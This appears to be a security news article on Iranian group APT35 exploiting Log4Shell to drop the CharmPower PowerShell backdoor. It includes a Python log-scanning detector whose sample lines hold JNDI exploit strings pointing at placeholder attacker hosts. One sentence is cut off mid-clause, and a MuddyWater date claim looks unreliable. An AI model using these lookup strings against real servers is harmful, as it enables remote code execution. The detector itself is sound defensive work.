Iranian hackers deploy PowerShell backdoor using Log4j flaw

State-sponsored threat actors try to abuse the Log4Shell flaw

Log4Shell flaw exploited by another hacker group

The vulnerability in publicly exposed Java applications was exploited to deploy a previously undocumented PowerShell-based backdoor. The modular trojan, named CharmPower, can follow up the exploitation with various actions and malicious processes.[1] Hackers known as the Charming Kitten group leveraged the Log4Shell attacks to drop a malware payload that can handle C2 communications, perform enumeration of the machine, and download, decrypt and load additional payloads.[2]

It appears that the setup of this campaign was relatively rushed, since basic open-source tooling was used for the exploitation. The fact that the campaign was based on earlier operations made the attack easier for the researchers to detect and attribute.[3] The APT35 hacker group is well known and can be identified by its infrastructure and by the specific toolsets it uses in most of its attacks.

The Log4Shell vulnerability that these threat actors exploited has caused major problems around the world. The CVE flaw, with a severity rating of 10.0, still haunts organizations and users in 2022.[4] The issue allows exploitation that leads to arbitrary code execution on affected systems.
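Because exploitation starts with a crafted lookup string landing in any logged field (User-Agent, query string, headers), the first place defenders can see this activity is their own web-server logs. The following detector is an added example written for this article, not code from the article or from Check Point: it URL-decodes and normalizes each line, collapses the nested-lookup obfuscation seen in the wild, flags lines carrying a JNDI lookup, and pulls out the callback scheme and host for blocking and hunting. The log lines are constructed sample data and the hostnames are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article); hosts are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2022:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [12/Jan/2022:10:00:02 +0000] "GET /index HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://c2.example.invalid/a}"',
    # Same probe, URL-encoded and wrapped in a ${lower:} lookup to dodge naive matching.
    '10.0.0.7 - - [12/Jan/2022:10:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A'
    '%2F%2Fevil.example.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    # Benign template-looking text: must NOT be flagged.
    '10.0.0.8 - - [12/Jan/2022:10:00:04 +0000] "GET /cart?coupon=%24%7Btotal%7D HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

JNDI_RE = re.compile(r"\$\{\s*jndi\s*:")
TARGET_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s:]+)")


def normalize(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly, lowercase, and collapse Log4j lookup obfuscation.

    ${lower:j} / ${upper:j} become j, and default-value lookups such as
    ${::-j} or ${env:NOPE:-j} become j, so "${${lower:j}ndi:" reads as "${jndi:".
    """
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.lower()
    prev = None
    while prev != s:  # repeat until no more wrappers remain (handles nesting)
        prev = s
        s = re.sub(r"\$\{(?:lower|upper):([^}$]*)\}", r"\1", s)
        s = re.sub(r"\$\{[^}$]*:-([^}$]*)\}", r"\1", s)
    return s


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalization."""
    return JNDI_RE.search(normalize(line)) is not None


def extract_target(line: str):
    """Return (scheme, host) of the JNDI callback, or None if the line is clean."""
    m = TARGET_RE.search(normalize(line))
    return (m.group(1), m.group(2)) if m else None


def scan(lines):
    """Return (1-based line number, raw line) for every line that carries a probe."""
    return [(i, line) for i, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for lineno, raw in scan(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup -> {extract_target(raw)}")
```

Feed real access logs in line by line; the extracted callback hosts are the values to block at the egress firewall and to pivot on when hunting for follow-on PowerShell activity on the exploited hosts. Note that a flagged line proves an attempt, not a compromise: the outbound LDAP/RMI connection from the Java process is the confirming signal.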

PowerShell modular backdoor CharmPower

The APT35 group reused various previously exposed operations known to be attributed to the group, but the modular backdoor revealed some new features. The malware is able to perform a range of tasks on the exploited machine. The trojan can validate the network connection after execution and make HTTP POST requests to

The script collects Windows version details, the computer name and the contents of files. The malware is capable of basic system enumeration and can retrieve the C&C domain. It decodes the retrieved domain and can download, decrypt and execute additional modules on the already affected machine.

These additional modules, which can be sent from the C2 server, can:

  • uninstall applications and gather information about installed apps;
  • capture screenshots;
  • gather information about running processes;
  • execute commands remotely;
  • clear traces of the malware, such as startup files and processes.

Iranian state-backed hackers are not stopping

Check Point published a list of similarities between this and other attacks involving the same hacker group. Specific features were shared between the group's Android spyware and CharmPower. The logging functions and other implementations in the code overlap with other campaigns of APT35, aka Charming Kitten. This is why researchers can determine the threat actor responsible for the attacks.

APT actors usually make sure to change their tools and infrastructure to avoid detection and make attribution harder. APT35, however, does not follow this practice.

Recently, Iranian hackers made headlines because US Cyber Command linked MuddyWater to the Iranian intelligence apparatus.[5] The group is a threat actor crew that carried out attacks targeting Middle Eastern, European and North American countries. There have always been suspicions that the group is state-backed.

The group is known for attacks directed against various entities in academia, government, cryptocurrency, telecommunications and the oil sector. It is believed that the hackers started their attacks in 2022. The threat actors also exploit vulnerabilities and leverage remote desktop management tools to spread backdoors and custom malware that give them unauthorized access to particularly sensitive and valuable data.

The hackers begin with the intrusion, after which data can be stolen from the exploited systems. Exploiting vulnerabilities also helps them exfiltrate data for further extortion and deploy ransomware, which is itself a vehicle for cryptocurrency extortion.
